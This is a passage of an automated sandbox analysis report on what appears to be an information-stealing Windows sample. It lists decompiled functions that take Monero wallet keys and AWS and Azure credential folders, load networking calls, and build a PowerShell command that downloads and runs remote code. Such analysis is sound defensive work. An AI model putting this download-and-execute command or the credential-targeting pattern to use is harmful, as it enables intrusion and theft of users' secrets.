                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414498
                          • lstrcpy.KERNEL32(00000000,?), ref: 004144D7
                          • lstrcat.KERNEL32(00000000,?), ref: 004144DF
                          • lstrlen.KERNEL32(00431794), ref: 004144EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414507
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00414513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 0041451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00414547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 004145A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 004145A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414601
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414653
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041467B
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004146AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: d9d7684133ca192ce360dcdbf0583e7857a5560f3789b52cf9a03aaccf1d0578
                          • Instruction ID: 9719116f80c923dde82e11cb9c7d465f57478066ed72e928f9e3dad62e1dd44b
                          • Opcode Fuzzy Hash: d9d7684133ca192ce360dcdbf0583e7857a5560f3789b52cf9a03aaccf1d0578
                          • Instruction Fuzzy Hash: CCB18170B112069BCB21EF79DE89A9F77A9AF44304F04103AB805E7291DF7CDC458BA8
                          Function 004157A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004157D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00415804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00415868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004158C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004158D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004158F8
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00415961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415988
                          • lstrlen.KERNEL32(00431794), ref: 0041599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004159B9
                          • lstrcat.KERNEL32(00000000,00431794), ref: 004159C5
                          • lstrlen.KERNEL32(00FBCF80), ref: 004159D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004159F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00415A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00415A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415BB5
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00415BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: eca8acabcf741f8b3cf38b95802c8dd6a918646a14f7c24f35edd9d23cabb5b5
                          • Instruction ID: 71293e4b19a62bf970015fdbd7abc1fdb06261af6d5437264a10b1e2c9ba866e
                          • Opcode Fuzzy Hash: eca8acabcf741f8b3cf38b95802c8dd6a918646a14f7c24f35edd9d23cabb5b5
                          • Instruction Fuzzy Hash: 1D029D70A11605DFCB21EF69C989AEF7BB5AF84304F14412AF805A7390DB78DC85CB98
                          Function 00401190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
                            • Part of subcall function 00401120: RtlAllocateHeap.NTDLL(00000000), ref: 0040113C
                            • Part of subcall function 00401120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
                            • Part of subcall function 00401120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
                            • Part of subcall function 00401120: RegCloseKey.ADVAPI32(?), ref: 0040117D
                          • lstrcat.KERNEL32(?,00000000), ref: 004011C0
                          • lstrlen.KERNEL32(?), ref: 004011CD
                          • lstrcat.KERNEL32(?,.keys), ref: 004011E8
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040121F
                          • lstrlen.KERNEL32(00FB8B30), ref: 0040122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401251
                          • lstrcat.KERNEL32(00000000,00FB8B30), ref: 00401259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00401264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004012BA
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004012FF
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0040130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401335
                          • lstrcat.KERNEL32(00000000,?), ref: 0040133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401378
                          • lstrcat.KERNEL32(00000000), ref: 00401385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004013AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 004013D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401401
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040143D
                            • Part of subcall function 0041EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0041EE12
                          • DeleteFileA.KERNEL32(?), ref: 00401471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: c6a36046e304ca859151f621e31f93dd328c32381cdb5c96bc049a6a5951fb6d
                          • Instruction ID: 4c8ff00ee4ac2f0ff241658e7160f53788a0b9240742c0c39d6cbbc9ea41ad1c
                          • Opcode Fuzzy Hash: c6a36046e304ca859151f621e31f93dd328c32381cdb5c96bc049a6a5951fb6d
                          • Instruction Fuzzy Hash: 6DA15C71B102059BCB21ABB9DD89A9F77B9AF44304F04107AF905F72E1DB78DD058BA8
                          Function 0041E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0041E740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0041E769
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E79F
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0041E7C6
                          • memset.MSVCRT ref: 0041E805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0041E82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E85F
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 0041E886
                          • memset.MSVCRT ref: 0041E8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E920
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0041E947
                          • memset.MSVCRT ref: 0041E986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 144444f1573a6f041bcdf4305b88e3bf646598b375764b6adbad9f922f3c5a97
                          • Instruction ID: dcd46d6675432c83c652afd316220d76f098c8514ac7530e828c9290d07be6c0
                          • Opcode Fuzzy Hash: 144444f1573a6f041bcdf4305b88e3bf646598b375764b6adbad9f922f3c5a97
                          • Instruction Fuzzy Hash: 1071FC71B40218ABD725EB64DC46FED7374AF48700F5404ADB619AB1C0DFB89A848F9C
                          Function 0041ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32 ref: 0041ABCF
                          • lstrlen.KERNEL32(00FBDCD8), ref: 0041ABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041AC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041AC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041ACB7
                          • lstrlen.KERNEL32(00434AD4), ref: 0041ACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041ACF3
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 0041ACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AD28
                          • lstrlen.KERNEL32(00434AD4), ref: 0041AD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AD5C
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 0041AD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AD91
                          • lstrlen.KERNEL32(00FBDD80), ref: 0041ADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041ADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041ADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041AE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041AE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AE6F
                          • lstrlen.KERNEL32(00000000), ref: 0041AE85
                          • lstrcpy.KERNEL32(00000000,00FBDF18), ref: 0041AEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 188521429213a4490580d65eede3cbdd68b32f9f61f7551c6e75461d2c3815fe
                          • Instruction ID: 2ba43ffc6f93962650281a06098b46ffd35bb56c03338a48977137f3e8636df4
                          • Opcode Fuzzy Hash: 188521429213a4490580d65eede3cbdd68b32f9f61f7551c6e75461d2c3815fe
                          • Instruction Fuzzy Hash: 61B17030A116169BCB21EB69DD4C6EFB3B6AF40304F04042AB405A72A1DBB8DD55CFD9
                          Function 004247E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,004172A4), ref: 004247E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 004247FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0042480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0042481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 0042482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00424840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 00424851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 00424862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00424873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00424884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 00424895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: f5155ff952da553fc3a3bff4ab4fb1888bde0f0d590b6b3d85c4f9227467158f
                          • Instruction ID: 4af547eeddcfd820e4710940f65f58a2354f142c75a2b38fbde9570d2269516e
                          • Opcode Fuzzy Hash: f5155ff952da553fc3a3bff4ab4fb1888bde0f0d590b6b3d85c4f9227467158f
                          • Instruction Fuzzy Hash: F2119675D52720AF8B149FA5AD0DB963ABABA0E709714391BF151D3160DBF84400DFE4
                          Function 0041BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041BE53
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041BE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0041BE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041BEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0041BEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041BEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041BEEB
                          • lstrlen.KERNEL32(')"), ref: 0041BEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041BF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 0041BF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041BF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0041BF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041BF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0041BF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041BFBA
                          • ShellExecuteEx.SHELL32(?), ref: 0041C00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: 93b88900fc31601816e430ac0df2830fc505696a406f936991b5f24f112f10ef
                          • Instruction ID: 38c8f8dad60f1a0c49673f1d29feaec6a6442272fd1057c9bcc558400938cbc4
                          • Opcode Fuzzy Hash: 93b88900fc31601816e430ac0df2830fc505696a406f936991b5f24f112f10ef
                          • Instruction Fuzzy Hash: BA619F71B102159BCB21AFBA8D896EF7BA9EF05304F00143AF405E3291DB78D9468FD8
                          Function 00421820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0042184F
                          • lstrlen.KERNEL32(00FA6058), ref: 00421860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004218C1
